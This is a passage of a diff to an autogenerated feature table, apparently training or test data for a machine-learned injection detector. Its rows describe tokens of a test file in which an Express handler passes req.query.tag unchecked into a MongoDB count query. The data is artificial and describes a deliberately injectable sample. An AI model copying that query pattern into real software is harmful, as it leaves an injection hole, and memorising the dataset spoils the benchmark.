autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:47:78:3 | (err, c ... });\\n } | InputArgumentIndex | 2 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:47:78:3 | (err, c ... });\\n } | calleeImports | mongodb | @@ -1815,6 +9707,96 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:47:78:3 | (err, c ... });\\n } | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:47:78:3 | (err, c ... });\\n } | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:47:78:3 | (err, c ... });\\n } | receiverName | MongoClient | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:47:78:3 | exceptional return of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:47:78:3 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:47:78:3 | exceptional return of anonymous function | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:47:78:3 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:47:78:3 | exceptional return of anonymous function | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:47:78:3 | return of anonymous function | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:47:78:3 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:47:78:3 | return of anonymous function | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:47:78:3 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:47:78:3 | return of anonymous function | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:48:72:50 | err | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:48:72:50 | err | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:48:72:50 | err | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:48:72:50 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:48:72:50 | err | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:53:72:58 | client | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:53:72:58 | client | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:53:72:58 | client | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:53:72:58 | client | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:53:72:58 | client | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:53:72:58 | client | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:53:72:58 | client | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:53:72:58 | client | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:53:72:58 | client | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:72:53:72:58 | client | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:73:10 | client | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:73:10 | client | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:73:10 | client | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:73:10 | client | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:73:10 | client | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:74:9 | client\\n .db | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:74:9 | client\\n .db | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:74:9 | client\\n .db | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:74:9 | client\\n .db | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:74:9 | client\\n .db | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:74:30 | client\\n ... B_NAME) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:74:30 | client\\n ... B_NAME) | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:74:30 | client\\n ... B_NAME) | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:74:30 | client\\n ... B_NAME) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:74:30 | client\\n ... B_NAME) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:74:30 | exceptional return of client\\n ... B_NAME) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:74:30 | exceptional return of client\\n ... B_NAME) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:74:30 | exceptional return of client\\n ... B_NAME) | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:74:30 | exceptional return of client\\n ... B_NAME) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:74:30 | exceptional return of client\\n ... B_NAME) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:75:17 | client\\n ... lection | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:75:17 | client\\n ... lection | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:75:17 | client\\n ... lection | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:75:17 | client\\n ... lection | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:75:17 | client\\n ... lection | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:75:25 | client\\n ... "logs") | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:75:25 | client\\n ... "logs") | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:75:25 | client\\n ... "logs") | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:75:25 | client\\n ... "logs") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:75:25 | client\\n ... "logs") | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:75:25 | exceptional return of client\\n ... "logs") | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:75:25 | exceptional return of client\\n ... "logs") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:75:25 | exceptional return of client\\n ... "logs") | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:75:25 | exceptional return of client\\n ... "logs") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:75:25 | exceptional return of client\\n ... "logs") | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:77:12 | client\\n ... .count | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:77:12 | client\\n ... .count | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:77:12 | client\\n ... .count | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:77:12 | client\\n ... .count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:77:12 | client\\n ... .count | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:77:27 | client\\n ... tag }) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:77:27 | client\\n ... tag }) | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:77:27 | client\\n ... tag }) | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:77:27 | client\\n ... tag }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:77:27 | client\\n ... tag }) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:77:27 | exceptional return of client\\n ... tag }) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:77:27 | exceptional return of client\\n ... tag }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:77:27 | exceptional return of client\\n ... tag }) | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:77:27 | exceptional return of client\\n ... tag }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:73:5:77:27 | exceptional return of client\\n ... tag }) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:8:74:9 | db | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:8:74:9 | db | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:8:74:9 | db | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:8:74:9 | db | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:8:74:9 | db | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:11:74:17 | process | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:11:74:17 | process | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:11:74:17 | process | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:11:74:17 | process | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:11:74:17 | process | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:11:74:21 | process.env | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:11:74:21 | process.env | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:11:74:21 | process.env | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:11:74:21 | process.env | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:11:74:21 | process.env | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:11:74:29 | process.env.DB_NAME | CalleeFlexibleAccessPath | client.db | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:11:74:29 | process.env.DB_NAME | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:11:74:29 | process.env.DB_NAME | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | @@ -1823,6 +9805,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:11:74:29 | process.env.DB_NAME | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:11:74:29 | process.env.DB_NAME | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:11:74:29 | process.env.DB_NAME | receiverName | client | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:19:74:21 | env | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:19:74:21 | env | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:19:74:21 | env | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:19:74:21 | env | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:19:74:21 | env | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:23:74:29 | DB_NAME | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:23:74:29 | DB_NAME | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:23:74:29 | DB_NAME | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:23:74:29 | DB_NAME | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:74:23:74:29 | DB_NAME | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:75:8:75:17 | collection | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:75:8:75:17 | collection | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:75:8:75:17 | collection | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:75:8:75:17 | collection | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:75:8:75:17 | collection | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:75:19:75:24 | "logs" | CalleeFlexibleAccessPath | client.db().collection | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:75:19:75:24 | "logs" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:75:19:75:24 | "logs" | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | @@ -1830,6 +9827,11 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:75:19:75:24 | "logs" | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:75:19:75:24 | "logs" | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:75:19:75:24 | "logs" | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:8:77:12 | count | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:8:77:12 | count | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:8:77:12 | count | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:8:77:12 | count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:8:77:12 | count | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:14:77:26 | { tags: tag } | CalleeFlexibleAccessPath | client.db().collection().count | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:14:77:26 | { tags: tag } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:14:77:26 | { tags: tag } | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | @@ -1837,6 +9839,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:14:77:26 | { tags: tag } | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:14:77:26 | { tags: tag } | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:14:77:26 | { tags: tag } | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:16:77:19 | tags | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:16:77:19 | tags | contextSurroundingFunctionParameters | (req, res)\n(err, client) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:16:77:19 | tags | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:16:77:19 | tags | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:16:77:19 | tags | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:16:77:24 | tags: tag | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:16:77:24 | tags: tag | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:16:77:24 | tags: tag | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:16:77:24 | tags: tag | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:16:77:24 | tags: tag | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:16:77:24 | tags: tag | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:16:77:24 | tags: tag | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:16:77:24 | tags: tag | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:16:77:24 | tags: tag | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:16:77:24 | tags: tag | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:22:77:24 | tag | CalleeFlexibleAccessPath | client.db().collection().count | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:22:77:24 | tag | InputAccessPathFromCallee | 0.tags | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:22:77:24 | tag | InputArgumentIndex | 0 | @@ -1846,6 +9863,36 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:22:77:24 | tag | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:22:77:24 | tag | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:77:22:77:24 | tag | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:7:80:17 | importedDbo | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:7:80:17 | importedDbo | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:7:80:17 | importedDbo | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:7:80:17 | importedDbo | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:7:80:17 | importedDbo | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:7:80:39 | importe ... bo.js") | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:7:80:39 | importe ... bo.js") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:7:80:39 | importe ... bo.js") | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:7:80:39 | importe ... bo.js") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:7:80:39 | importe ... bo.js") | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:7:80:39 | importedDbo | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:7:80:39 | importedDbo | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:7:80:39 | importedDbo | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:7:80:39 | importedDbo | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:7:80:39 | importedDbo | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:21:80:27 | require | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:21:80:27 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:21:80:27 | require | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:21:80:27 | require | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:21:80:27 | require | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:21:80:39 | exceptional return of require("./dbo.js") | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:21:80:39 | exceptional return of require("./dbo.js") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:21:80:39 | exceptional return of require("./dbo.js") | enclosingFunctionBody | req res tag req query tag MongoClient connect process env DB_URL err client client db process env DB_NAME collection logs count tags tag importedDbo require ./dbo.js importedDbo db collection logs count tags tag | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:21:80:39 | exceptional return of require("./dbo.js") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:21:80:39 | exceptional return of require("./dbo.js") | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:21:80:39 | require("./dbo.js") | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:80:21:80:39 | require("./dbo.js") | contextSurroundingFunctionParameters | 